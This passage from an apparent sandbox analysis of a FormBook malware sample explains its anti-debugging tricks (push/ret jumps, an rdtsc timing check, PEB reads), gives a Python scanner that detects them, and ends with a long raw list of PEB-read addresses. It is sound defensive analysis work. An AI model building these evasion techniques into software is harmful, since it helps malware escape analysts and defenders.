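          The instruction-level evidence in this report comes in three shapes: the push/ret and push/retf pairs listed under the code-obfuscation entries earlier (a push of a value followed by ret is an indirect jump that disassemblers do not follow), the two-rdtsc sequence "rdtsc; xor ecx, ecx; add ecx, eax; rdtsc" (a cycle-count delta, inflated by the VM exits a hypervisor or single-stepping debugger causes), and the long list of "mov eax/ecx, dword ptr fs:[00000030h]" reads that follows, which fetch the PEB pointer. On the last group a caveat: every one of those function addresses (0x0173xxxx to 0x01808xxx) lies inside the 0x01710000 region of process 3 in which the report found the wntdll.pdb string, so these are most plausibly ntdll's own PEB accesses in a copy of ntdll mapped at that address rather than code unique to the sample; the reads at 0x004xxxxx (the rdtsc and LdrLoadDll functions) are the ones in the payload image itself. The Python below is an added example written for this page, not report output or FormBook code: it scans a byte buffer for the fixed x86 encodings of those sequences, decodes push-imm32/ret targets, and pairs nearby rdtsc instructions. The buffer is constructed from the report's instruction text plus one follow-on pattern the report does not show (the movzx of PEB.BeingDebugged at offset 2), which is labelled as an assumption. It is a linear byte matcher, not a disassembler, so hits are leads to confirm, not verdicts.

```python
"""Byte-pattern scan for the anti-analysis instruction sequences this report lists.

Added example written for this page; not part of the report or of the malware.
Matches fixed x86 encodings by linear byte scan, so data bytes can produce
false hits: treat results as leads for a real disassembler.
"""
import struct
from typing import Dict, List, Tuple

Hit = Tuple[int, str, str]          # (offset, category, detail)
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
RETS = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}

# Constructed test buffer assembling the sequences quoted in the report
# (rdtsc pair, push imm32/ret, push esi/retf, push esp/iretd, fs:[30h] reads)
# plus one follow-on check NOT shown in the report, assumed for illustration:
# the read of PEB.BeingDebugged at offset 2 of the PEB.
SAMPLE = bytes.fromhex(
    "0F31" "33C9" "03C8" "0F31"     # rdtsc; xor ecx,ecx; add ecx,eax; rdtsc
    "68AF0033C0" "C3"               # push 0C03300AFh; ret
    "56" "CB"                       # push esi; retf
    "54" "CF"                       # push esp; iretd
    "64A130000000"                  # mov eax, fs:[30h]          (PEB pointer)
    "0FB64002"                      # movzx eax, byte ptr [eax+2] (PEB.BeingDebugged; assumed follow-on)
    "648B0D30000000"                # mov ecx, fs:[30h]
)


def scan_x86(code: bytes) -> List[Hit]:
    """Walk the buffer once, emitting a hit for each known encoding and skipping its length."""
    hits: List[Hit] = []
    i, n = 0, len(code)
    while i < n:
        rest = code[i:]
        b = rest[0]
        if rest[:2] == b"\x0f\x31":
            hits.append((i, "rdtsc", "rdtsc"))
            i += 2
        elif rest[:6] == b"\x64\xa1\x30\x00\x00\x00":
            hits.append((i, "peb-read", "mov eax, fs:[30h]"))
            i += 6
        elif rest[:7] in (b"\x64\x8b\x05\x30\x00\x00\x00", b"\x64\x8b\x0d\x30\x00\x00\x00"):
            reg = "eax" if rest[2] == 0x05 else "ecx"
            hits.append((i, "peb-read", f"mov {reg}, fs:[30h]"))
            i += 7
        elif rest[:4] == b"\x0f\xb6\x40\x02":
            hits.append((i, "beingdebugged", "movzx eax, byte ptr [eax+2]"))
            i += 4
        elif b == 0x68 and len(rest) >= 6 and rest[5] == 0xC3:
            target = struct.unpack_from("<I", rest, 1)[0]      # push imm32; ret == jmp imm32
            hits.append((i, "push-ret", f"push 0x{target:08X}; ret  (jump to 0x{target:08X})"))
            i += 6
        elif 0x50 <= b <= 0x57 and len(rest) >= 2 and rest[1] in RETS:
            hits.append((i, "push-ret", f"push {REGS[b - 0x50]}; {RETS[rest[1]]}"))
            i += 2
        else:
            i += 1
    return hits


def rdtsc_pairs(hits: List[Hit], window: int = 16) -> List[Tuple[int, int]]:
    """Two rdtsc within `window` bytes of each other: a cycle-delta timing check."""
    offs = [o for o, cat, _ in hits if cat == "rdtsc"]
    return [(a, b) for a, b in zip(offs, offs[1:]) if b - a <= window]


def summarize(hits: List[Hit]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for _, cat, _ in hits:
        counts[cat] = counts.get(cat, 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_x86(SAMPLE)
    for off, cat, detail in found:
        print(f"+0x{off:04X} {cat:14s} {detail}")
    print("rdtsc pairs:", rdtsc_pairs(found))
    print("summary:", summarize(found))
```

On a real dump the interesting output is the push-imm32 targets (they recover the control flow the push/ret hides) and any rdtsc pair, which marks the timing check that the report's "RDTSC instruction interceptor" lines were intercepting; a lone fs:[30h] read without a follow-on byte-2 or NtGlobalFlag access is just normal PEB use.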
          (Each entry below names a function and the number of fs:[00000030h] PEB reads the report found in it.)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0173B171 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0173C962 mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0175B944 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0176513A mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01754120 mov eax, dword ptr fs:[00000030h] (x4); mov ecx, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01739100 mov eax, dword ptr fs:[00000030h] (x3)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0173B1E1 mov eax, dword ptr fs:[00000030h] (x3)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017C41E8 mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017B51BE mov eax, dword ptr fs:[00000030h] (x4)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017661A0 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017F49A4 mov eax, dword ptr fs:[00000030h] (x4)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017B69A6 mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01762990 mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0176A185 mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0175C182 mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017F2073 mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01750050 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0176002D mov eax, dword ptr fs:[00000030h] (x5)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0174B02A mov eax, dword ptr fs:[00000030h] (x4)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017B7016 mov eax, dword ptr fs:[00000030h] (x3)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017340E1 mov eax, dword ptr fs:[00000030h] (x3)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01804015 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017358EC mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017CB8D0 mov eax, dword ptr fs:[00000030h] (x5); mov ecx, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0176F0BF mov ecx, dword ptr fs:[00000030h] (x1); mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017620A0 mov eax, dword ptr fs:[00000030h] (x6)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017790AF mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01739080 mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01801074 mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017B3884 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01763B7A mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0173DB60 mov ecx, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01805BA5 mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0173F358 mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0173DB40 mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017F131B mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017603E2 mov eax, dword ptr fs:[00000030h] (x6)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0175DBE9 mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017B53CA mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01808B58 mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01764BAD mov eax, dword ptr fs:[00000030h] (x3)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01762397 mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0176B390 mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017F138A mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01741B8F mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017ED380 mov ecx, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0177927A mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017EB260 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017FEA55 mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017C4257 mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01739240 mov eax, dword ptr fs:[00000030h] (x4)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01774A2C mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01735210 mov eax, dword ptr fs:[00000030h] (x3); mov ecx, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0173AA16 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01753A1C mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017FAA16 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01748A0A mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01762AE4 mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01762ACB mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0174AAB0 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0176FAB0 mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017352A5 mov eax, dword ptr fs:[00000030h] (x5)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0176D294 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01808A62 mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0175C577 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01757D50 mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_018005AC mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01773D43 mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017B3540 mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017E3D40 mov eax, dword ptr fs:[00000030h] (x1)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h] (x7)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]3_2_01743D34
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]3_2_01743D34
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]3_2_01743D34
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]3_2_01743D34
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]3_2_01743D34
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]3_2_01743D34
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173AD30 mov eax, dword ptr fs:[00000030h]3_2_0173AD30
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FE539 mov eax, dword ptr fs:[00000030h]3_2_017FE539
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017BA537 mov eax, dword ptr fs:[00000030h]3_2_017BA537
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01764D3B mov eax, dword ptr fs:[00000030h]3_2_01764D3B
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01764D3B mov eax, dword ptr fs:[00000030h]3_2_01764D3B
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01764D3B mov eax, dword ptr fs:[00000030h]3_2_01764D3B
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017E8DF1 mov eax, dword ptr fs:[00000030h]3_2_017E8DF1
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174D5E0 mov eax, dword ptr fs:[00000030h]3_2_0174D5E0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174D5E0 mov eax, dword ptr fs:[00000030h]3_2_0174D5E0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FFDE2 mov eax, dword ptr fs:[00000030h]3_2_017FFDE2
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FFDE2 mov eax, dword ptr fs:[00000030h]3_2_017FFDE2
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FFDE2 mov eax, dword ptr fs:[00000030h]3_2_017FFDE2
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FFDE2 mov eax, dword ptr fs:[00000030h]3_2_017FFDE2
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6DC9 mov eax, dword ptr fs:[00000030h]3_2_017B6DC9
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6DC9 mov eax, dword ptr fs:[00000030h]3_2_017B6DC9
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6DC9 mov eax, dword ptr fs:[00000030h]3_2_017B6DC9
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6DC9 mov ecx, dword ptr fs:[00000030h]3_2_017B6DC9
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6DC9 mov eax, dword ptr fs:[00000030h]3_2_017B6DC9
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6DC9 mov eax, dword ptr fs:[00000030h]3_2_017B6DC9
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01808D34 mov eax, dword ptr fs:[00000030h]3_2_01808D34
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01761DB5 mov eax, dword ptr fs:[00000030h]3_2_01761DB5
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01761DB5 mov eax, dword ptr fs:[00000030h]3_2_01761DB5
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01761DB5 mov eax, dword ptr fs:[00000030h]3_2_01761DB5
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017635A1 mov eax, dword ptr fs:[00000030h]3_2_017635A1
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176FD9B mov eax, dword ptr fs:[00000030h]3_2_0176FD9B
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176FD9B mov eax, dword ptr fs:[00000030h]3_2_0176FD9B
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01762581 mov eax, dword ptr fs:[00000030h]3_2_01762581
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01762581 mov eax, dword ptr fs:[00000030h]3_2_01762581
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01762581 mov eax, dword ptr fs:[00000030h]3_2_01762581
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01762581 mov eax, dword ptr fs:[00000030h]3_2_01762581
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01732D8A mov eax, dword ptr fs:[00000030h]3_2_01732D8A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01732D8A mov eax, dword ptr fs:[00000030h]3_2_01732D8A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01732D8A mov eax, dword ptr fs:[00000030h]3_2_01732D8A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01732D8A mov eax, dword ptr fs:[00000030h]3_2_01732D8A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01732D8A mov eax, dword ptr fs:[00000030h]3_2_01732D8A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175746D mov eax, dword ptr fs:[00000030h]3_2_0175746D
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CC450 mov eax, dword ptr fs:[00000030h]3_2_017CC450
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CC450 mov eax, dword ptr fs:[00000030h]3_2_017CC450
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176A44B mov eax, dword ptr fs:[00000030h]3_2_0176A44B
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01808CD6 mov eax, dword ptr fs:[00000030h]3_2_01808CD6
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176BC2C mov eax, dword ptr fs:[00000030h]3_2_0176BC2C
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6C0A mov eax, dword ptr fs:[00000030h]3_2_017B6C0A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6C0A mov eax, dword ptr fs:[00000030h]3_2_017B6C0A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6C0A mov eax, dword ptr fs:[00000030h]3_2_017B6C0A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6C0A mov eax, dword ptr fs:[00000030h]3_2_017B6C0A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F14FB mov eax, dword ptr fs:[00000030h]3_2_017F14FB
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6CF0 mov eax, dword ptr fs:[00000030h]3_2_017B6CF0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6CF0 mov eax, dword ptr fs:[00000030h]3_2_017B6CF0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6CF0 mov eax, dword ptr fs:[00000030h]3_2_017B6CF0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0180740D mov eax, dword ptr fs:[00000030h]3_2_0180740D
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0180740D mov eax, dword ptr fs:[00000030h]3_2_0180740D
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0180740D mov eax, dword ptr fs:[00000030h]3_2_0180740D
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174849B mov eax, dword ptr fs:[00000030h]3_2_0174849B
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174FF60 mov eax, dword ptr fs:[00000030h]3_2_0174FF60
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174EF40 mov eax, dword ptr fs:[00000030h]3_2_0174EF40
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176E730 mov eax, dword ptr fs:[00000030h]3_2_0176E730
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01734F2E mov eax, dword ptr fs:[00000030h]3_2_01734F2E
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01734F2E mov eax, dword ptr fs:[00000030h]3_2_01734F2E
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175F716 mov eax, dword ptr fs:[00000030h]3_2_0175F716
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CFF10 mov eax, dword ptr fs:[00000030h]3_2_017CFF10
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CFF10 mov eax, dword ptr fs:[00000030h]3_2_017CFF10
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176A70E mov eax, dword ptr fs:[00000030h]3_2_0176A70E
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176A70E mov eax, dword ptr fs:[00000030h]3_2_0176A70E
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017737F5 mov eax, dword ptr fs:[00000030h]3_2_017737F5
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0180070D mov eax, dword ptr fs:[00000030h]3_2_0180070D
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0180070D mov eax, dword ptr fs:[00000030h]3_2_0180070D
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01748794 mov eax, dword ptr fs:[00000030h]3_2_01748794
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01808F6A mov eax, dword ptr fs:[00000030h]3_2_01808F6A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B7794 mov eax, dword ptr fs:[00000030h]3_2_017B7794
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B7794 mov eax, dword ptr fs:[00000030h]3_2_017B7794
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B7794 mov eax, dword ptr fs:[00000030h]3_2_017B7794
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175AE73 mov eax, dword ptr fs:[00000030h]3_2_0175AE73
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175AE73 mov eax, dword ptr fs:[00000030h]3_2_0175AE73
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175AE73 mov eax, dword ptr fs:[00000030h]3_2_0175AE73
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175AE73 mov eax, dword ptr fs:[00000030h]3_2_0175AE73
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175AE73 mov eax, dword ptr fs:[00000030h]3_2_0175AE73
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174766D mov eax, dword ptr fs:[00000030h]3_2_0174766D
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01800EA5 mov eax, dword ptr fs:[00000030h]3_2_01800EA5
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01800EA5 mov eax, dword ptr fs:[00000030h]3_2_01800EA5
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01800EA5 mov eax, dword ptr fs:[00000030h]3_2_01800EA5
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01747E41 mov eax, dword ptr fs:[00000030h]3_2_01747E41
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01747E41 mov eax, dword ptr fs:[00000030h]3_2_01747E41
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01747E41 mov eax, dword ptr fs:[00000030h]3_2_01747E41
